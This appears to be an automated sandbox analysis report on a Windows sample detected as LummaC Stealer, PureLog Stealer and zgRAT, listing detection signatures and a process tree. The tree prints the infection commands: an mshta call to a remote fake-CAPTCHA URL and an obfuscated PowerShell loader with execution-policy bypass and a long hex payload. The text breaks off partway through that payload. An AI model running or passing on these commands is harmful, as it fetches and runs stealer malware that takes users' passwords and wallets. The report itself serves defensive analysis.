Edit tour
Windows
Analysis Report
Overview
Detection
LummaC Stealer, PureLog Stealer, zgRAT
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Yara detected Costura Assembly Loader
Abnormal high CPU Usage
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- cmd.exe (PID: 7300 cmdline:
cmd /C ""C :\WINDOWS\ system32\m shta.exe" https://so lve.fizq.n et/awjxs.c aptcha" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7308 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - mshta.exe (PID: 7356 cmdline:
"C:\WINDOW S\system32 \mshta.exe " https:// solve.fizq .net/awjxs .captcha MD5: 06B02D5C097C7DB1F109749C45F3F505) - powershell.exe (PID: 7572 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -ep U nrestricte d -nop fun ction ERrX H($NPRZ){r eturn -spl it ($NPRZ -replace ' ..', '0x$& ')};$ZMck o = ERrXH( '6C99A3362 30E5A2C9C9 A564A467FC C7257DD8D7 3078CDDBE0 2A1C1E1CFE DEF1F69966 C54CB1E028 5E1AC81545 FC7B37E419 47EEF4312D 686A1E5ECA 561E4B330B 6BA4E39137 E46B1CF88F 17B1CB79DD D3D8F77137 F26D202635 1102801E1B 8EE83DC3C6 3D271BF7B2 D32A103440 FFAF27E51B 9A655BC0FF 4EAF177552 11742BE41D 6E00A001C4 AB1700E496 BCEB4C89D0 0508B0B685 40C20C9352 04C74F180A A8B22C7493 BDE52C7E08 2CAA9BE5DA 2E40EDA75A 53BD815D98 4B8564B6C5 038B4A0821 4FF76BAA31 263424BB9E 93A9CE0F6F 32C5E9C04A 3878210984 A5C49EF444 88BBF880C6 2CFC91A641 624C5D3BBD 2FC8D66374 9EC8640E19 E84846FD13 EBD37FE167 ECAADF42A3 A5F2558572 7DE5C37C22 3ECF8D8B39 7DCD90774A DCB0FD5889 8F52117E75 CF08D8FF61 DB1811D9B8 4EFF315D83 7D713331AF E66E19BFD8 4FF8BA54B1 99FCB0269C BE56507C12 EA8637FEA0 A67B6D1231 4008A1A25D 934DBDC48F A684F23E9C 501CDA3D6E DD7E1DB278 77FEBE1B14 34E17BC899 F36D51BA73 9F65076153 83E3B76DC4 DA7CF7DB09 6F71CD34EF 427E409688 C24F8BB3BD 0F3DB16EAA BE36CD4879 8812B320FE A85CA4F718 67DC6D4858 2D57779650 11C7B4801F B2CDB18E83 428C7808F6 38DAAF946C 009B3F07F0 9FF06C12C7 6831DD7747 D232DFD24F B9801CADBF D5E5EC908A 1E51EC88CD E84AF039CE 48EFE74A55 8CA4CBD92F 3BCFA89B2A A00759AF0A 0859F3F4ED 35DBE2626C 1F3844FACF BE69C3AF62 DE312661FA 0A1C9EF460 D20A5D1998 52B92C4883 BFF88E5B2F 1FDABA90D7 1163E5DDB1 A17351D3D5 69C380BD9B 27019E63CA D3FBC9C1BF 7848CF2863 60E4C58DC0 982C67C6AE F5785616C9 877FDCC9B7 3B1A787A21 FBB8F5F7E0 6CCEF0CBA5 3610C8E045 9F28EE9916 0390976D47 65E779A2A8 09EC1AB4F2 D73A45E246 DFF920777B 5146119035 35C5ED407A DDBF093B06 01148111BD F803C8B56E 525FA9858F 48A247B219 67016E863E 2168D3C4E8 9C41F15B44 CEDBF3C30A 49DB22F27A 6E8D16F4FD B02943C76A CD37202238 7AC294C26B 60DAF5F676 870DAA3C0F B0B090D799 6806834504 CCE1C17B4E 8229467DA4 57082CAF7F 79AC294EB1 2BF534C76E 52C69F0E15 7B56FD8069 B76BDB2EED 8385CD903F A7A13DA82C DBF4E8A8CF 38A0A2E5F4 242E1C26E5 BCB6F3AF8E 2445C1B494 CCB5C69DC5 8B7746F0C7 9D2DA71653 0BDCA02459 C015DBB2AB EA4BECB260 97E41CE2FB D300A920FD 18318366C5 D4B7A04C83 3A236496C4 C8A6188EE9 A72760FA54 EB5221B296 0085B7A18C BB9E11E7CC 4689666D21 3681E9A7D4 1F02061038 A45FF0FE8E BBC097E9B2 E8CAC4EDF3 BF43758115 832CE1E282 83D795091E 9DAAAC752B D4A4516CE6 DDB72B53E8 186CA1A4D7 7D156AFBE0 3BE987790E 9776784A6E 70627F727E D765D7F51E 83778A499E 2FF2CD51DA 0DBFD93391 4AEF22FD2C DEAEB1305C 5570317DB8 D7475A9AD7 38EBF38792 7CED9E50E2 B520DD916E D2A173D9E0 03B4C8EF8F 37E793194E 4E01D9D0CF 44488AFE08 0882337889 87E7EF92C4 EA59C09AE3 C6978D85B8 0137C2B4DC 42B109F429 9AB74B6133 D2390EB63B 68D01047C5 6B1C0BAD51